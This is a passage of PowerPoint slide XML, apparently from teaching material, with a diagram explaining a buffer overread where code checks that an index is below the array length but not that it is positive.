              <a:gd name="connsiteY3" fmla="*/ 0 h 395926"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3940404"/>
              <a:gd name="connsiteY0" fmla="*/ 395926 h 405352"/>
              <a:gd name="connsiteX1" fmla="*/ 1687398 w 3940404"/>
              <a:gd name="connsiteY1" fmla="*/ 405352 h 405352"/>
              <a:gd name="connsiteX2" fmla="*/ 3271101 w 3940404"/>
              <a:gd name="connsiteY2" fmla="*/ 141402 h 405352"/>
              <a:gd name="connsiteX3" fmla="*/ 3940404 w 3940404"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 405352"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3940404"/>
              <a:gd name="connsiteY0" fmla="*/ 395926 h 417777"/>
              <a:gd name="connsiteX1" fmla="*/ 1687398 w 3940404"/>
              <a:gd name="connsiteY1" fmla="*/ 405352 h 417777"/>
              <a:gd name="connsiteX2" fmla="*/ 3110845 w 3940404"/>
              <a:gd name="connsiteY2" fmla="*/ 207389 h 417777"/>
              <a:gd name="connsiteX3" fmla="*/ 3940404 w 3940404"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 417777"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3921551"/>
              <a:gd name="connsiteY0" fmla="*/ 254524 h 276375"/>
              <a:gd name="connsiteX1" fmla="*/ 1687398 w 3921551"/>
              <a:gd name="connsiteY1" fmla="*/ 263950 h 276375"/>
              <a:gd name="connsiteX2" fmla="*/ 3110845 w 3921551"/>
              <a:gd name="connsiteY2" fmla="*/ 65987 h 276375"/>
              <a:gd name="connsiteX3" fmla="*/ 3921551 w 3921551"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 276375"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3921551"/>
              <a:gd name="connsiteY0" fmla="*/ 256425 h 278276"/>
              <a:gd name="connsiteX1" fmla="*/ 1687398 w 3921551"/>
              <a:gd name="connsiteY1" fmla="*/ 265851 h 278276"/>
              <a:gd name="connsiteX2" fmla="*/ 3110845 w 3921551"/>
              <a:gd name="connsiteY2" fmla="*/ 67888 h 278276"/>
              <a:gd name="connsiteX3" fmla="*/ 3921551 w 3921551"/>
              <a:gd name="connsiteY3" fmla="*/ 1901 h 278276"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3921551"/>
              <a:gd name="connsiteY0" fmla="*/ 255666 h 275453"/>
              <a:gd name="connsiteX1" fmla="*/ 1687398 w 3921551"/>
              <a:gd name="connsiteY1" fmla="*/ 265092 h 275453"/>
              <a:gd name="connsiteX2" fmla="*/ 2780907 w 3921551"/>
              <a:gd name="connsiteY2" fmla="*/ 95409 h 275453"/>
              <a:gd name="connsiteX3" fmla="*/ 3921551 w 3921551"/>
              <a:gd name="connsiteY3" fmla="*/ 1142 h 275453"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3921551" h="275453">
                <a:moveTo>
                  <a:pt x="0" y="255666"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="562466" y="258808"/>
                  <a:pt x="1223914" y="291801"/>
                  <a:pt x="1687398" y="265092"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2150882" y="238383"/>
                  <a:pt x="2408548" y="139401"/>
                  <a:pt x="2780907" y="95409"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3153266" y="51417"/>
                  <a:pt x="3242035" y="-9071"/>
                  <a:pt x="3921551" y="1142"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="009DDC"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="stealth" w="lg" len="lg"/>
            <a:tailEnd type="none" w="lg" len="lg"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Rectangle 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F861E3D-6E9F-4EB3-86E2-7246C9EB3103}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5503054" y="4575962"/>
            <a:ext cx="3566698" cy="492443"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009DDC"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Validates that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009DDC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009DDC"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> is less than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009DDC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>arrayLen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009DDC"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>, but doesn’t validate that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009DDC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009DDC"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> is a positive value.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="47" name="Group 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC02C4A2-45CD-4694-9208-4EAC8BBEBEB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="730460" y="2943480"/>
            <a:ext cx="4572835" cy="926542"/>
            <a:chOff x="2516925" y="5343977"/>
            <a:chExt cx="4572835" cy="926542"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EBE8B17-A8AB-4563-BB5C-1A86E286A36A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2516925" y="5344002"/>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a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="TextBox 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ACE0272-2CB8-4036-B923-E8937347666E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2821725" y="5344002"/>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e</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B882844-5251-4854-933E-C0B6400AA421}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3126525" y="5344002"/>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c</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86FD05F6-4878-4B35-A0EC-FA3CAAA83FB6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3430106" y="5343977"/>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r</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="TextBox 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D907DC5-FCD8-472A-B686-51DD267388F9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3736810" y="5343977"/>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e</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="TextBox 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFDDD2D3-DA39-46F9-ACC2-FFC3AF41DD20}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4041610" y="5343977"/>
              <a:ext cx="304800" cy="369332"/>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dirty="0"/>
                <a:t>t</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="TextBox 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3669C62C-3041-495A-97C6-3D3E8CBDBC27}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4347094" y="5344002"/>
              <a:ext cx="304800" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>N</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="TextBox 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B603CC11-8012-437E-BF40-D004DC609992}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4651894" y="5344002"/>
              <a:ext cx="304800" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>o</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="TextBox 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F351F159-C72A-4F57-9FF4-D528CA0F2AB0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4956694" y="5344002"/>
              <a:ext cx="304800" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>t</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="TextBox 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B27CDE5-3B97-435B-A30A-F6467EE759CA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5261494" y="5344002"/>
              <a:ext cx="304800" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>S</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="TextBox 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DD34D6E-9C33-4C75-B57B-3DDA2BCEC563}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5566979" y="5343977"/>
              <a:ext cx="304800" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>e</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="TextBox 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F73E7E2-CFE4-4AD9-AF57-D71EECFDB9F8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5871779" y="5343977"/>
              <a:ext cx="304800" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>c</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="TextBox 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11A24DB8-19C9-4642-9307-E30E9D4178D6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6176579" y="5343977"/>
              <a:ext cx="304800" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>r</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="TextBox 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2A407BC-6337-4C07-B24C-8F8FA24A711C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6481379" y="5343977"/>
              <a:ext cx="304800" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>e</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="TextBox 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7999A90-29D7-4279-B480-6758F2CE1E38}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6784960" y="5343977"/>
              <a:ext cx="304800" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>t</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="AutoShape 303">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DBDF24B-3FCC-4E09-9510-0E5E3160BD8C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="5629338" y="4543504"/>
              <a:ext cx="174626" cy="2670018"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 65909"/>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Rounded Rectangle 135">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFE78F1D-ABF2-492C-99D3-B5E755F63A63}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4975744" y="5995882"/>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000000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>The buffer (array)</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="AutoShape 303">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18EDFA6B-7ECC-47DA-94F6-CE025D6365B4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="3325111" y="4983014"/>
              <a:ext cx="174626" cy="1790998"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 65909"/>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Rounded Rectangle 135">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D18D5E9-B160-453E-9BB9-8FE98268F558}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2682910" y="5995882"/>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000000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>Overread</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Rectangle 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A667138-743F-4CC2-9D3F-D78B57CF8C6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5510282" y="5105400"/>
            <a:ext cx="3443901" cy="692497"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009DDC"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009DDC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009DDC"/>
                </a:solidFill>
